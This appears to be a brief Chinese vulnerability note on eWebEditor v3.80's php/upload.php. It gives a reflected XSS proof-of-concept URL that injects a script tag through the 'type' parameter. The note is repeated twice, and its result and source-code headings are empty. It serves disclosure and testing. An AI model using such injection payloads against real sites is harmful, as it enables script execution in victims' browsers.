eWebEditor v3.80 php/php/upload.php
反射型XSS
POC:
php/upload.php?action=save&type=1"><script>alert(1)</script><!--
结果:
源码:
eWebEditor v3.80 php/php/upload.php
反射型XSS
POC:
php/upload.php?action=save&type=1"><script>alert(1)</script><!--
结果:
源码: